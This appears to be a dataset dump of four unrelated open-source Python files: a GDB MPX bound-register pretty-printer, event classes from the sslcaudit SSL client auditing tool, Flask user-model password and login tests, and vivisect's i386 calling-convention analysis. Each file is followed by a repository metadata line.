# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import gdb.printing
class MpxBound128Printer:
"""Adds size field to a mpx __gdb_builtin_type_bound128 type."""
def __init__ (self, val):
self.val = val
def to_string (self):
upper = self.val["ubound"]
lower = self.val["lbound"]
        size = int(upper - lower)
if size > -1:
size = size + 1
result = '{lbound = %s, ubound = %s} : size %s' % (lower, upper, size)
return result
gdb.printing.add_builtin_pretty_printer ('mpx_bound128',
'^__gdb_builtin_type_bound128',
MpxBound128Printer)
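# Once registered, a __gdb_builtin_type_bound128 value prints roughly as
# (values illustrative): {lbound = 0x602010, ubound = 0x60201f} : size 16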
| thanhphat11/android_kernel_xiaomi_msm8996 | toolchains/share/gdb/python/gdb/printer/bound_registers.py | Python | gpl-2.0 | 1,386 |
# ----------------------------------------------------------------------
# SSLCAUDIT - a tool for automating security audit of SSL clients
# Released under terms of GPLv3, see COPYING.TXT
# Copyright (C) 2012 Alexandre Bezroutchko [email protected]
# ----------------------------------------------------------------------
class ControllerEvent(object):
'''
Base class.
'''
pass
class ConnectionAuditEvent(ControllerEvent):
'''
This is a base class for events produced while auditing individual connections.
'''
def __init__(self, conn, profile):
self.conn = conn
self.profile = profile
def __eq__(self, other):
return (self.__class__ == other.__class__) and (self.__dict__ == other.__dict__)
class ConnectionAuditResult(ConnectionAuditEvent):
'''
This class contains audit results returned by handle() method of subclasses of BaseServerHandler. It
contains the results of the audit of a single connection.
'''
def __init__(self, conn, profile, result):
ConnectionAuditEvent.__init__(self, conn, profile)
self.result = result
def __str__(self):
return 'ConnectionAuditResult(%s, %s)' % (self.profile, self.result)
class SessionStartEvent(ControllerEvent):
'''
    This event is generated by ClientServerSessionHandler on the very first connection.
It carries the list of test profiles scheduled for this client.
'''
def __init__(self, session_id, profiles):
self.session_id = session_id
self.profiles = profiles
class SessionEndResult(ControllerEvent):
'''
    This event is generated by ClientServerSessionHandler after the very last connection.
    It contains the results produced by the handle() methods of all client connection auditors, for a single client.
'''
def __init__(self, session_id):
self.session_id = session_id
self.results = []
def add(self, res):
self.results.append(res)
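# Usage sketch ('conn' and the profile/result values are placeholders):
#   session = SessionEndResult(session_id=1)
#   session.add(ConnectionAuditResult(conn=None, profile='sslv2', result='ok'))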
| grwl/sslcaudit | sslcaudit/core/ConnectionAuditEvent.py | Python | gpl-3.0 | 1,966 |
import pytest
from datetime import datetime
from pytest_flask import fixtures
from flask_login import current_user, login_user
from mdt_app.models import User
@pytest.mark.usefixtures('client_class', 'db_session', 'populate_db')
class TestUserModel():
def setup(self):
self.user = User(f_name='test', l_name='user', is_confirmed=True,
username='testuser', email='[email protected]',
password='woop')
def test_password_setter(self):
u = User(password='cat')
assert u.password_hash is not None
def test_no_password_getter(self):
u = User(password='cat')
with pytest.raises(AttributeError):
u.password
def test_password_verification(self):
u = User(password='cat')
assert u.verify_password('cat') is True
assert u.verify_password('dog') is False
def test_password_salts_are_random(self):
u = User(password='cat')
u2 = User(password='cat')
assert u.password_hash != u2.password_hash
def test_repr(self):
u = User(username='Geoff')
assert u.__repr__() == '<User: Geoff>'
def test_load_user(self):
user1 = User.query.first()
login_user(user1)
assert User.load_user(user1.id) == user1
assert current_user == user1 | stefpiatek/mdt-flask-app | tests/unit/test_auth_models.py | Python | mit | 1,339 |
"""
An i386 specific function analysis module that is designed to
attempt to detect the calling convention.
"""
import collections
import vivisect.impemu.monitor as viv_imp_monitor
import vivisect.exc as v_exc
from vivisect.const import *
import vivisect.analysis.generic.switchcase as vag_switch
import envi.archs.i386 as e_i386
regcalls = {
(e_i386.REG_ECX,): ('thiscall', 1),
(e_i386.REG_EAX,): ('bfastcall', 1),
(e_i386.REG_EAX, e_i386.REG_EDX): ('bfastcall', 2),
(e_i386.REG_ECX, e_i386.REG_EDX): ('msfastcall', 2),
(e_i386.REG_EAX, e_i386.REG_ECX, e_i386.REG_EDX): ('bfastcall', 3),
}
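# Reading the table: a function that consumed ECX before initializing it is
# classified as 'thiscall' with one register-borne argument, ECX+EDX maps to
# 'msfastcall' with two, and so on (see buildFunctionApi below).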
# Arrange the same data for a name lookup
# Fallback for unknown conventions; the default factory takes no arguments,
# and argcname() below synthesizes ('int', 'argN') itself on a miss.
empty = collections.defaultdict(lambda: None)
argnames = {
'thiscall': {0: ('void *','ecx'),},
'msfastcall': {0: ('int','ecx'), 1: ('int','edx')},
'bfastcall': {0: ('int','eax'), 1: ('int','edx'), 2: ('int','ecx'),},
}
def argcname(callconv, idx):
ret = argnames.get(callconv,empty).get(idx)
if ret is None:
ret = ('int','arg%d' % idx)
return ret
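# e.g. argcname('thiscall', 0) == ('void *', 'ecx'), while
# argcname('thiscall', 1) == ('int', 'arg1') via the stack-arg fallback.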
class AnalysisMonitor(viv_imp_monitor.AnalysisMonitor):
def __init__(self, vw, fva):
viv_imp_monitor.AnalysisMonitor.__init__(self, vw, fva)
self.retbytes = None
self.endstack = None
self.addDynamicBranchHandler(vag_switch.analyzeJmp)
self.badops = vw.arch.archGetBadOps()
def prehook(self, emu, op, starteip):
if op in self.badops:
raise v_exc.BadOpBytes(op.va)
viv_imp_monitor.AnalysisMonitor.prehook(self, emu, op, starteip)
# Do return related stuff before we execute the opcode
if op.isReturn():
self.endstack = emu.getStackCounter()
if len(op.opers):
self.retbytes = op.opers[0].imm
def buildFunctionApi(vw, fva, emu, emumon, stkstart):
# More than 40 args? no way...
argc = stackargs = (int(emumon.stackmax) >> 2)
if argc > 40:
emumon.logAnomaly(emu, fva, 'Crazy Stack Offset Touched: 0x%.8x' % emumon.stackmax)
argc = 0
callconv = "cdecl" # Default to cdecl
# see if we have stdcall return bytes
if emumon.retbytes is not None:
callconv = "stdcall"
argc = emumon.retbytes >> 2
stackidx = 0 # arg index of first *stack* arg
# Log registers we used but didn't init
# but don't take into account ebp and esp
emu.uninit_use.pop(e_i386.REG_ESP, None)
emu.uninit_use.pop(e_i386.REG_EBP, None)
undefkeys = list(emu.uninit_use.keys())
undefkeys.sort()
undeflen = len(undefkeys)
if undeflen:
regcall = regcalls.get(tuple(undefkeys))
if regcall is not None:
callconv, addargc = regcall
argc += addargc
vw.setFunctionMeta(fva, "UndefRegUse", undefkeys)
# if we're callee cleanup, make sure we *actually* clean up our space
# otherwise, revert us to caller cleanup
if emumon.endstack:
stkoff = (emumon.endstack - stkstart) >> 2
if callconv in argnames:
# do our stack args line up with what we cleaned up?
if abs(stkoff) != stackargs:
# we're probably caller cleanup then
callconv = callconv + '_caller'
if argc > 64:
callconv = 'unkcall'
argc = 0
# Add argument indexes to our argument names
funcargs = [ argcname(callconv, i) for i in range(argc) ]
api = ('int',None,callconv,None,funcargs)
vw.setFunctionApi(fva, api)
return api
def analyzeFunction(vw, fva):
emu = vw.getEmulator()
emumon = AnalysisMonitor(vw, fva)
stkstart = emu.getStackCounter()
emu.setEmulationMonitor(emumon)
emu.runFunction(fva, maxhit=1)
# Do we already have API info in meta?
# NOTE: do *not* use getFunctionApi here, it will make one!
api = vw.getFunctionMeta(fva, 'api')
if api is None:
api = buildFunctionApi(vw, fva, emu, emumon, stkstart)
rettype,retname,callconv,callname,callargs = api
if callconv == 'unkcall':
return
argc = len(callargs)
cc = emu.getCallingConvention(callconv)
stcount = cc.getNumStackArgs(emu, argc)
stackidx = argc - stcount
baseoff = cc.getStackArgOffset(emu, argc)
# Register our stack args as function locals
for i in range(stcount):
vw.setFunctionLocal(fva, baseoff + ( i * 4 ), LSYM_FARG, i+stackidx)
emumon.addAnalysisResults(vw, emu)
| bat-serjo/vivisect | vivisect/analysis/i386/calling.py | Python | apache-2.0 | 4,460 |